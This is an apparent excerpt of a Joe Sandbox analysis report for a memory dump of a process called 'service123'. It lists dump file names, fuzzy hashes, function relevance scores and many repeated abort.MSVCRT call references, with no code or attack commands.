Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID: @
API String ID: 4206212132-2766056989
Opcode ID: c1f080c91d7c4614fce9c400255f972c21737c9dadfba050286739fb1a4ea25a
Instruction ID: d07e5b73db3a927d5a19f3d5cd134e944a066e9574372258e6246cd8ad18031f
Opcode Fuzzy Hash: c1f080c91d7c4614fce9c400255f972c21737c9dadfba050286739fb1a4ea25a
Instruction Fuzzy Hash: 8FB103B260D31E8FC710CE2CC4D0756B7F2AB89318F854579EE9597F95C235AA09CB81

Function 6C212290 Relevance: 42.4, APIs: 28, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a395407a580d42437aee327f5cf227e5cc60795ad867178ee07418f5378b1610
Instruction ID: 3972f877e3ad73704ce73739138020b848022a9e8f586acbf8948de4ecfa70f1
Opcode Fuzzy Hash: a395407a580d42437aee327f5cf227e5cc60795ad867178ee07418f5378b1610
Instruction Fuzzy Hash: EFC1F3B06082498FD704CF28C48475AB7E2BF46318F14956AEE98DFF45D739E94ACB90

Function 6C21B7A0 Relevance: 42.2, APIs: 28, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbab238b42eb6d327d40be9e232ecd1d34ade2612f4282992c1ee3b0b0ec758b
Instruction ID: ad940afc669f1cc878c7b28c815430f1e87820bfccf17004e7f2e056b22929d2
Opcode Fuzzy Hash: cbab238b42eb6d327d40be9e232ecd1d34ade2612f4282992c1ee3b0b0ec758b
Instruction Fuzzy Hash: DE41BFB650938E9FD710CA29C0807267BF0AF46319F28899DEE958BB52C335E846C741

Function 6C2129F0 Relevance: 42.1, APIs: 28, Instructions: 78COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C2E6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: e0e134e4dcc559898d747ab4e77dedf2c73659d37a0968bfce05a30611b7369b
Instruction ID: cc0ed29a8ecd53304864bcf1076acaa755b91f91c1c79bb032b40f6ac11f822e
Opcode Fuzzy Hash: e0e134e4dcc559898d747ab4e77dedf2c73659d37a0968bfce05a30611b7369b
Instruction Fuzzy Hash: 7D0128B2515209CFE704FF28D4D5B55B7B0FB11309F119A48DA84DBA15D738E428CF90

Function 6C2128BB Relevance: 42.1, APIs: 28, Instructions: 73COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C2E6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 6233a5f37898b8a1f8b55a8a36b0584f8b93c718a86fcaf1aa12581bee51cb3c
Instruction ID: df8ee2823f4ce76b75e89b5dee67b3b4f8a3960b0a77f09899f1db0e3d20abfd
Opcode Fuzzy Hash: 6233a5f37898b8a1f8b55a8a36b0584f8b93c718a86fcaf1aa12581bee51cb3c
Instruction Fuzzy Hash: 2C013CB154620ACBE704FF18D4D5B66B7B0FB12309F119A48DA85EBB15C739E428CF91

Function 6C212A6E Relevance: 42.1, APIs: 28, Instructions: 71COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C2E6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: d48595ade570981699b8a974678d407cbc95f0f22dbbb3b8bf7a6a2f85e75bec
Instruction ID: baeae90647d4a1f6620663e9a66ce65fbb067deffbfc97cce3f1440c13e6caf5
Opcode Fuzzy Hash: d48595ade570981699b8a974678d407cbc95f0f22dbbb3b8bf7a6a2f85e75bec
Instruction Fuzzy Hash: 230149B154520ACBE704EF18D4E5B6AB7B0FB12309F119A48D954EBB15C735E428CF90

Function 6C212B13 Relevance: 42.1, APIs: 28, Instructions: 69COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C2E6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: a9b9ae2e9c1623b8d2fe63e7a80aa72b5775d9403ce03d615a42c6fff7ef2657
Instruction ID: f17a70e6d2f7fbfef0b8ea5dba1e327f2000c3c4690b1e82bc9d3f153d8268b3
Opcode Fuzzy Hash: a9b9ae2e9c1623b8d2fe63e7a80aa72b5775d9403ce03d615a42c6fff7ef2657
Instruction Fuzzy Hash: 6EF067B150920ACBD704EF18D4D5BAAB7B1FF22309F11AA48C944ABB16C734E428CF90

Function 6C212AAD Relevance: 42.1, APIs: 28, Instructions: 65COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6C2E6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 42cb04174e517b95debf363eaaac638b5257424482f54fccb70328da38562c99
Instruction ID: a2d0514627ae6e5e43631c817da2fb4d6964161e9b86fdf73ba82b4d054dc0af
Opcode Fuzzy Hash: 42cb04174e517b95debf363eaaac638b5257424482f54fccb70328da38562c99
Instruction Fuzzy Hash: E0F017B154920A8BD704AF18C0D5B6AF7B1FF16308F51A948C915ABE06D735E428CF91

Function 6C21B930 Relevance: 40.6, APIs: 27, Instructions: 135COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C21C5DB), ref: 6C2E6D44
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D4C
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D51
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D56
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D5B
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D60
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D65
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6A
abort.MSVCRT(?,?,?,?,?,?,6C21E2F4,?,?,?,?,?,?,00000000,00000001,6C22008D), ref: 6C2E6D6F
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D74
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D79
abort.MSVCRT(?,?,00000000,00000000,?,7591E010,6C22038F), ref: 6C2E6D7E

Memory Dump Source

Source File: 00000005.00000002.3291559833.000000006C211000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C210000, based on PE: true

Associated: 00000005.00000002.3291532769.000000006C210000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291669166.000000006C2ED000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291695138.000000006C2EF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291745132.000000006C338000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291770238.000000006C339000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.3291795013.000000006C33C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c210000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: fea985f2103968dbbcaeb81cca131ba52403feb211fa1ffaf7c4e41e65879316
Instruction ID: 3b8f5454b1c9fb54ec0a1506c7d282d26b44628de9e672534669aed72bbadc1f
Opcode Fuzzy Hash: fea985f2103968dbbcaeb81cca131ba52403feb211fa1ffaf7c4e41e65879316
Instruction Fuzzy Hash: 4E31E1B024D70D9FC700CE5AC481796B3F2EB89311F40892AEF9487F51D334A8559F91

Function 6C21BFCC Relevance: 39.1, APIs: 26, Instructions: 63COMMON

Download Yara Rule

